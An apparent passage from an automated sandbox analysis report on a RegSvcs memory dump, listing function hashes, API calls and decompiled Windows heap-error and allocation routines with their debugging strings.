Function 0041E2A1 Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E2D4

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b31eb40a7d3126e665ab9d1351ef7cf2ea54cae8a675b131f7ed7f13a38823ba
Instruction ID: e665e0adfaba7da7772e0e05696dc1ee53a9bd7b2f264760bfe31bd025ae77b2
Opcode Fuzzy Hash: b31eb40a7d3126e665ab9d1351ef7cf2ea54cae8a675b131f7ed7f13a38823ba
Instruction Fuzzy Hash: CAE01AB52002086BDB14EF89DC49FE737ACEF88754F014655FD095B251D630E955CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E267 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(0041821D,?,004189C4,004189C4,?,0041821D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E294

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
Instruction ID: 5c59f9dad65f7070bf79f0b513b9422a8c379a8c9e0860a5bbedef532b7c26f3
Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
Instruction Fuzzy Hash: 5CE01AB52002046BD718EF59DC45E9737ACAF88754F014155FE085B241C530F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E2A7 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E2D4

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
Instruction ID: f9bbcd0bbad3ab976e3d51c72bf14069bde301eca1423841a2c699288eed52af
Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
Instruction Fuzzy Hash: 5CE01AB52002046BD714EF49DC49ED737ACAF88754F014155FD0857241D530F914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E407 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F479,0040F479,?,00000000,?,?), ref: 0041E437

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
Instruction ID: 16ef4adca365ed10da625f2b181f360b7e95d713d0e80674a9c344b79d4a7bc0
Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
Instruction Fuzzy Hash: 08E01AB52002086BD714EF49CC45EE737ADAF88654F118159FE0857241D630F8108AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F627 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetUserGeoID.KERNELBASE(00000010), ref: 0040F651

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: User
String ID:
API String ID: 765557111-0
Opcode ID: 5b4c2c0c8bec28892eedc95aafcf7fad4a0b0af15f624cc6097e05c14d954683
Instruction ID: 13248a8fb497261f911739ff4d2380bd87cc81713be80c88317d5ba46a84e736
Opcode Fuzzy Hash: 5b4c2c0c8bec28892eedc95aafcf7fad4a0b0af15f624cc6097e05c14d954683
Instruction Fuzzy Hash: 27E0C27368030466F620A1A58C42FA6324E5B84B04F048474F908E72C1E5A9F5800018

Uniqueness

Uniqueness Score: -1.00%

Function 0041E2E7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,00000000,000000AB,?,?,00000001), ref: 0041E30F

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
Instruction ID: 8756eb1b2e4da8b51ae36d2c85e9fd1ef48ab7d23850e69d2eda5ac900cd7a17
Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
Instruction Fuzzy Hash: 8ED0C2352002087BC620EB89CC45FD3379CDF44794F004065FA0C5B241C530BA00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E2D9 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(0041821D,?,004189C4,004189C4,?,0041821D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E294

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02872944ed19544669d505306a983d3d38c51c2baec627b1bc66aa7b59bb3777
Instruction ID: 8fff3f75c47b1554888b50ff3a1176b14b2446a3fb5e70a525240e1a46e8b417
Opcode Fuzzy Hash: 02872944ed19544669d505306a983d3d38c51c2baec627b1bc66aa7b59bb3777
Instruction Fuzzy Hash: 69C0807571412519F505F7567C50DF15B1EE550364394479FD54881002447F50C04598

Uniqueness

Uniqueness Score: -1.00%

Function 00FF967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF9694

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b9525552292d5a0be96de21b8348237ddc0a7c4e439882b1a89104f1b1fec01
Instruction ID: f881db37625621e7fe6fe0e71de5aa699e1c378e0f8685fc5917a0e06b65f703
Opcode Fuzzy Hash: 2b9525552292d5a0be96de21b8348237ddc0a7c4e439882b1a89104f1b1fec01
Instruction Fuzzy Hash: 8CB09B71D054C9C5E611D7E14608B277B007FD0751F16C051D2424645A87B8C491F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0106B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0106B3D6
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0106B2DC
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0106B38F
read from, xrefs: 0106B4AD, 0106B4B2
a NULL pointer, xrefs: 0106B4E0
<unknown>, xrefs: 0106B27E, 0106B2D1, 0106B350, 0106B399, 0106B417, 0106B48E
an invalid address, %p, xrefs: 0106B4CF
The resource is owned exclusively by thread %p, xrefs: 0106B374
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0106B314
*** An Access Violation occurred in %ws:%s, xrefs: 0106B48F
*** enter .exr %p for the exception record, xrefs: 0106B4F1
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0106B323
write to, xrefs: 0106B4A6
The instruction at %p referenced memory at %p., xrefs: 0106B432
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0106B47D
*** enter .cxr %p for the context, xrefs: 0106B50D
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0106B484
Go determine why that thread has not released the critical section., xrefs: 0106B3C5
The critical section is owned by thread %p., xrefs: 0106B3B9
*** then kb to get the faulting stack, xrefs: 0106B51C
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0106B39B
This failed because of error %Ix., xrefs: 0106B446
*** Inpage error in %ws:%s, xrefs: 0106B418
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0106B476
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0106B305
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0106B53F
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0106B2F3
The instruction at %p tried to %s , xrefs: 0106B4B6
The resource is owned shared by %d threads, xrefs: 0106B37E
*** Resource timeout (%p) in %ws:%s, xrefs: 0106B352

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: db9e2429bea6b835e10141dad1720d5ad731a0ec479c3b1947984b03856f9f2b
Instruction ID: 904f60279a9b88c9b6d221bcf46dc2749b5ef5dcd6e93c1cb21ee1ce06c0d21a
Opcode Fuzzy Hash: db9e2429bea6b835e10141dad1720d5ad731a0ec479c3b1947984b03856f9f2b
Instruction Fuzzy Hash: 3D8113F1B40210FFDB21AA09DC85EAF3B6ABF57B51F4040A4F585AB152D761C402EBB2

Uniqueness

Uniqueness Score: -1.00%

Function 01071C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01071C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xf948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FBB150();
				} else {
					E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x10a589c);
				E00FBB150("Heap error detected at %p (heap handle %p)\n",  *0x10a58a0);
				_t27 =  *0x10a5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01071E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FBB150();
				} else {
					E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00FBB150("Error code: %d - %s\n",  *0x10a5898);
				_t113 =  *0x10a58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FBB150();
					} else {
						E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FBB150("Parameter1: %p\n",  *0x10a58a4);
				}
				_t115 =  *0x10a58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FBB150();
					} else {
						E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FBB150("Parameter2: %p\n",  *0x10a58a8);
				}
				_t117 =  *0x10a58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FBB150();
					} else {
						E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FBB150("Parameter3: %p\n",  *0x10a58ac);
				}
				_t119 =  *0x10a58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FBB150();
					} else {
						E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x10a58b4);
					E00FBB150("Last known valid blocks: before - %p, after - %p\n",  *0x10a58b0);
				} else {
					_t120 =  *0x10a58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FBB150();
				} else {
					E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00FBB150("Stack trace available at %p\n", 0x10a58c0);
			}

0x01071c10
0x01071c16
0x01071c1e
0x01071c3d
0x01071c3e
0x01071c20
0x01071c35
0x01071c3a
0x01071c44
0x01071c55
0x01071c5a
0x01071c65
0x01071c67
0x00000000
0x01071c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01071c67
0x01071cdc
0x01071ce5
0x01071d04
0x01071d05
0x01071ce7
0x01071cfc
0x01071d01
0x01071d0b
0x01071d17
0x01071d1f
0x01071d25
0x01071d30
0x01071d4f
0x01071d50
0x01071d32
0x01071d47
0x01071d4c
0x01071d61
0x01071d67
0x01071d68
0x01071d6e
0x01071d79
0x01071d98
0x01071d99
0x01071d7b
0x01071d90
0x01071d95
0x01071daa
0x01071db0
0x01071db1
0x01071db7
0x01071dc2
0x01071de1
0x01071de2
0x01071dc4
0x01071dd9
0x01071dde
0x01071df3
0x01071df9
0x01071dfa
0x01071e00
0x01071e0a
0x01071e13
0x01071e32
0x01071e33
0x01071e15
0x01071e2a
0x01071e2f
0x01071e39
0x01071e4a
0x01071e02
0x01071e02
0x01071e08
0x00000000
0x00000000
0x01071e08
0x01071e5b
0x01071e7a
0x01071e7b
0x01071e5d
0x01071e72
0x01071e77
0x01071e95

Strings

heap_failure_usage_after_free, xrefs: 01071CBB
Parameter2: %p, xrefs: 01071DA5
Parameter3: %p, xrefs: 01071DEE
Stack trace available at %p, xrefs: 01071E86
Parameter1: %p, xrefs: 01071D5C
Error code: %d - %s, xrefs: 01071D12
heap_failure_buffer_overrun, xrefs: 01071C98
heap_failure_invalid_allocation_type, xrefs: 01071CB4
heap_failure_cross_heap_operation, xrefs: 01071CC2
heap_failure_freelists_corruption, xrefs: 01071CC9
heap_failure_virtual_block_corruption, xrefs: 01071C91
heap_failure_block_not_busy, xrefs: 01071CA6
heap_failure_listentry_corruption, xrefs: 01071CD0
heap_failure_multiple_entries_corruption, xrefs: 01071C8A
heap_failure_buffer_underrun, xrefs: 01071C9F
heap_failure_lfh_bitmap_mismatch, xrefs: 01071CD7
Last known valid blocks: before - %p, after - %p, xrefs: 01071E45
heap_failure_invalid_argument, xrefs: 01071CAD
heap_failure_internal, xrefs: 01071C6E
heap_failure_unknown, xrefs: 01071C75
HEAP: , xrefs: 01071C16, 01071C3D, 01071D04, 01071D4F, 01071D98, 01071DE1, 01071E32, 01071E7A
heap_failure_generic, xrefs: 01071C7C
heap_failure_entry_corruption, xrefs: 01071C83
HEAP[%wZ]: , xrefs: 01071C30, 01071CF7, 01071D42, 01071D8B, 01071DD4, 01071E25, 01071E6D
Heap error detected at %p (heap handle %p), xrefs: 01071C50

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 785acdf167e7ddaaccc1f98cb43b2c8c3ee52bb4dfbe384834b5fc1c30cfeb54
Instruction ID: 2692c78be01c50fe3a5c75e8d0bc5d036a89852f5aaff24a2296efb8de2b47ce
Opcode Fuzzy Hash: 785acdf167e7ddaaccc1f98cb43b2c8c3ee52bb4dfbe384834b5fc1c30cfeb54
Instruction Fuzzy Hash: C761F836E24544DFD711AB89E895D2473E8EB04B20B09807AF9896B392C6789C40AF5E

Uniqueness

Uniqueness Score: -1.00%

Function 01072D82 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 228
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E01072D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1090e80);
				E0100D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E00FB40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E010730C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E00FBB150();
						} else {
							E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E00FBB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E00FCEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01074496(_t181, 0);
						_t177 = L00FD4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E010749A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0106FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E00FB1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E00FE16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01074496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x10a6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x10a6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x10a6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E00FBB150();
								} else {
									E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0105D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E00FBB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E00FBB150();
								} else {
									E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E00FBB150("Just allocated block at %p for %Ix bytes\n",  *0x10a6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x10a6378 = 1;
									 *0x10a60c0 = 0;
									asm("int3");
									 *0x10a6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x10a5708; // 0x0
					 *0x10ab1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E0100D130(0, _t177, _t181);
				}
			}

0x01072d82
0x01072d84
0x01072d89
0x01072d8e
0x01072d90
0x01072d92
0x01072d97
0x01072d9a
0x01072da4
0x01072dc0
0x01072dc3
0x01072dd1
0x01072dd6
0x01072dd8
0x010730a7
0x010730a7
0x010730aa
0x010730aa
0x010730ad
0x010730b4
0x00000000
0x010730b9
0x01072de3
0x01072de8
0x01072deb
0x01072dee
0x01072df1
0x01072df3
0x01072dfb
0x01072dfb
0x01072df5
0x01072df5
0x01072df5
0x01072e04
0x01072e0a
0x01072e0d
0x01072e11
0x01072e11
0x01072e12
0x01072e15
0x01072e18
0x01072e1a
0x01073027
0x01073027
0x0107302d
0x01073030
0x0107304f
0x01073054
0x01073032
0x01073047
0x0107304c
0x0107305a
0x01073063
0x00000000
0x01072e20
0x01072e20
0x01072e23
0x00000000
0x00000000
0x01072e29
0x01072e2b
0x01072e47
0x01072e2d
0x01072e33
0x01072e38
0x01072e3f
0x01072e42
0x01072e42
0x01072e4e
0x01072e5d
0x01072e5f
0x01072e62
0x01072e66
0x01072e6b
0x01072e6d
0x00000000
0x01072e73
0x01072e73
0x01072e76
0x01072e7a
0x01072e83
0x01072e83
0x01072e83
0x01072e85
0x01072e87
0x01072e8a
0x01072e8d
0x01072e92
0x01072e9c
0x01072e9f
0x01072ea1
0x01072ea2
0x01072ea6
0x01072ea6
0x01072e9f
0x01072eab
0x01072eaf
0x01072edf
0x01072ee2
0x01072ee5
0x01072eb1
0x01072eb3
0x01072eb8
0x01072ebd
0x01072ec4
0x01072ed6
0x01072ec6
0x01072ec7
0x01072ecc
0x01072ecf
0x01072ed2
0x01072ed2
0x01072ed9
0x01072ed9
0x01072ee8
0x01072eeb
0x01072eef
0x01072ef2
0x01072efe
0x01072f04
